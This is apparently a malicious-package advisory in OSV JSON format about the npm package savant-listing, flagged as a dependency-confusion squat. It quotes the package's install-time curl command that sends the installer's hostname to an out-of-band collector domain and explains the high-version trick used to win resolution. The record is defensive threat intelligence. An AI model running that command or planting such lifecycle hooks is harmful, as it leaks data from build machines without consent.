{"id":"MAL-2026-5401","summary":"Malicious code in savant-listing (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (7360e78a5c5d56ea9323cde1f41e33ce8cc6b625034ef82d067bbfeafee60461)\nsavant-listing@999.9.9 is a dependency-confusion squat. package.json declares both `install` and `postinstall` lifecycle scripts that run `curl https://d8fnie486mdq306lb5kgttwrnhxwj33g5.oast.online/info/?hostname=$(hostname)`, unconditionally exfiltrating the installer host's hostname to an out-of-band interaction (OAST/interactsh) collector on every `npm install`. The version `999.9.9` and description `SAFE PoC - Demonstrates dependency confusion` are consistent with a package published to the public registry to win version resolution over an internal package of the same name on victim build systems. The destination is a transient, attacker-controlled OAST subdomain not associated with any legitimate publisher; the harm fires automatically at install time without any user interaction.\n","modified":"2026-06-09T17:16:27.775347350Z","published":"2026-06-09T16:05:25Z","database_specific":{"malicious-packages-origins":[{"sha256":"2d6b7c657fc5ab0647f053b2eea71bebc1d720e7a70abf0316323af2a9d849aa","id":"IN-MAL-2026-004961","import_time":"2026-06-09T16:59:44.63530747Z","source":"amazon-inspector","modified_time":"2026-06-09T16:06:10Z","versions":["999.9.10"]},{"sha256":"518fb2425e398b68afc0ced11b5ccf24fbcab3aae9c831b1a34a830c941f5963","id":"IN-MAL-2026-004956","import_time":"2026-06-09T16:59:44.341667267Z","modified_time":"2026-06-09T16:05:25Z","versions":["999.9.9"],"source":"amazon-inspector"},{"sha256":"7360e78a5c5d56ea9323cde1f41e33ce8cc6b625034ef82d067bbfeafee60461","id":"IN-MAL-2026-004955","import_time":"2026-06-09T16:59:44.240310521Z","versions":["999.9.9"],"modified_time":"2026-06-09T16:05:25Z","source":"amazon-inspector"},{"sha256":"972304a7ce9c3b67c976d03f4c2769d33ec68e2ff01b358a8ab374793c7ce078","modified_time":"2026-06-09T16:06:10Z","import_time":"2026-06-09T16:59:44.695269124Z","id":"IN-MAL-2026-004962","versions":["999.9.10"],"source":"amazon-inspector"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/savant-listing/v/999.9.10"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/savant-listing/v/999.9.9"}],"affected":[{"package":{"name":"savant-listing","ecosystem":"npm","purl":"pkg:npm/savant-listing"},"versions":["999.9.10","999.9.9"],"database_specific":{"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/savant-listing/MAL-2026-5401.json","indicators":{"evidence_files":[{"sha256":"a4c0237994ad97ad0dab04882a231e78076c22632c9f04b395a1f2943decd18a","path":"package.json","tlsh":"abe0617045108e3336d802a17c66950f9852fb2b041d9c544feb154d971d336117d317"}],"package_integrity":[{"hashes":{"sha512_sri":"sha512-ekMuvz54s6MjpQOMjogc55GS8OiQ/ZLo9E+siMG9vJi31LzICYyCwLV7XhUxaYuufkIkHgKrjr93YdVuiu7KyQ==","sha1":"80788d649ee21b6a0bd0fd9d536f0bc3fa1d9b96"},"filename":"savant-listing-999.9.10.tgz"}],"domains":["d8fnie486mdq306lb5kgttwrnhxwj33g5.oast.online"]},"cwes":[{"cweId":"CWE-506","name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature."},{"name":"Embedded Malicious Code","cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature."}]}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}